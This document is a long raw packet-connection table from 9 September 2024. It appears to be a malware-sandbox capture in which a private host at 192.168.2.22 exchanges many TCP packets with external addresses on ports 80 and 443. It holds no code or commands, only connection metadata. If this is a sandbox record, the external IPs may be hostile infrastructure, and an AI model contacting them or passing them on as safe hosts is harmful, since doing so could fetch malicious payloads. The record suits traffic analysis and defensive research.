                                        Sep 9, 2024 17:34:35.901838064 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901849985 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901860952 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901873112 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901882887 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901884079 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901895046 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901896000 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901909113 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901909113 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901921988 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901926041 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901941061 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901954889 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.901958942 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.901995897 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902333975 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902374029 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902404070 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902415991 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902440071 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902544022 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902555943 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902568102 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902579069 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902585983 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902601004 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902617931 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902666092 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902681112 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902693987 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902699947 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902709007 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902718067 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902721882 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.902730942 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902741909 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.902757883 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903158903 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903203964 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903213978 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903225899 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903264999 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903264999 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903304100 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903315067 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903326988 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903340101 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903341055 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903358936 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903368950 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903471947 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903484106 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903496981 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903508902 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903512955 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903522015 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903527975 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903537035 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903542042 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903549910 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903556108 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903565884 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.903572083 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903584957 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.903598070 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904062986 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904112101 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904155016 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904167891 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904228926 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904232979 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904244900 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904256105 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904268980 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904273033 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904288054 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904303074 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.904306889 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.904337883 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.906527996 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.906570911 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.906603098 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.906637907 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907259941 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907306910 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907313108 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907325983 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907346010 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907381058 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907398939 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907418966 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907421112 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907430887 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907433987 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907444000 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907483101 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907550097 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907563925 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907576084 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907587051 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907592058 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907603979 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907605886 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907618999 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907618999 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907632113 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907636881 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907644987 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907651901 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907665014 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907676935 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907747030 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907779932 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907793045 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907804012 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907820940 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907835960 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907901049 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907912970 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907926083 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.907951117 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.907965899 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:37.186203957 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:38.735531092 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:38.735580921 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:38.735646009 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:38.742341995 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:38.742352962 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.332942963 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.333224058 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.354943991 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.354971886 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.355284929 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.559410095 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.559489965 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.579346895 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.619410992 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.756659031 CEST804916785.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:39.756737947 CEST4916780192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:39.823189020 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.823225021 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.823251963 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.823291063 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.823318958 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.823334932 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.823359013 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.823712111 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.845911026 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.845941067 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.845966101 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.845978022 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.845989943 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.846124887 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.888444901 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.888484001 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.888520002 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.888535023 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.888550997 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.888550997 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.919493914 CEST804916495.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:39.919568062 CEST4916480192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:39.919688940 CEST4916480192.168.2.2295.217.202.210
                                        Sep 9, 2024 17:34:39.924663067 CEST804916495.217.202.210192.168.2.22
                                        Sep 9, 2024 17:34:39.931716919 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.931755066 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.931792021 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.931807041 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.931827068 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.931909084 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.933300018 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.933326006 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.933351040 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.933356047 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.933389902 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.933614016 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.934977055 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.935002089 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.935036898 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.935043097 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.935065031 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.935265064 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.996994972 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.997025967 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:39.997168064 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.997168064 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:39.997196913 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.005069017 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.018836021 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.018909931 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.018937111 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.018960953 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.018975019 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.019515038 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.019541025 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.019558907 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.019567966 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.019579887 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.020595074 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.020613909 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.020636082 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.020642996 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.020654917 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.021684885 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.021711111 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.021727085 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.021733046 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.021745920 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.023302078 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.023343086 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.023351908 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.023391962 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.030991077 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.030993938 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.031043053 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.061798096 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.061826944 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.061856985 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.061862946 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.061881065 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.062001944 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.062165976 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.062194109 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.062217951 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.062222958 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.062239885 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.062592983 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.083816051 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.083848000 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.083877087 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.083883047 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.083900928 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.084074974 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.105602980 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.105633974 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.105668068 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.105676889 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.105700016 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.105732918 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.105763912 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.105787039 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.105792046 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.105815887 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.105942965 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.106450081 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.106486082 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.106513023 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.106518984 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.106539011 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.106708050 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.107259989 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.107286930 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.107316017 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.107321024 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.107343912 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.107635021 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.107661009 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.107695103 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.107702971 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.107727051 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.148885012 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.148910999 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.148953915 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.148960114 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.148982048 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.170157909 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.170228004 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.170232058 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.170264006 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.170296907 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.170629978 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.170696020 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.170696020 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.170728922 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.170758009 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.192127943 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.192187071 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.192202091 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.192225933 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.192251921 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.192583084 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.192640066 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.192646027 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.192668915 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.192698956 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.193053007 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.193103075 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.193114042 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.193140984 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.193188906 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.193195105 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.193561077 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.193610907 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.193615913 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.193630934 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.193681955 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.193692923 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.193929911 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.197133064 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.197190046 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.197206974 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.197210073 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.197230101 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.197261095 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.197341919 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.235615969 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.235649109 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.235676050 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.235682964 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.235702038 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.235878944 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.256969929 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.257004976 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.257036924 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.257061005 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.257076979 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.257404089 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.257428885 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.257450104 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.257453918 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.257477999 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.269292116 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.278676033 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.278702021 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.278738976 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.278744936 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.278755903 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.279102087 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.279124975 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.279145002 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.279150009 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.279166937 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.279181004 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.279582024 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.279601097 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.279624939 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.279629946 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.279642105 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.280096054 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.280119896 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.280139923 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.280143976 CEST44349170207.241.227.96192.168.2.22
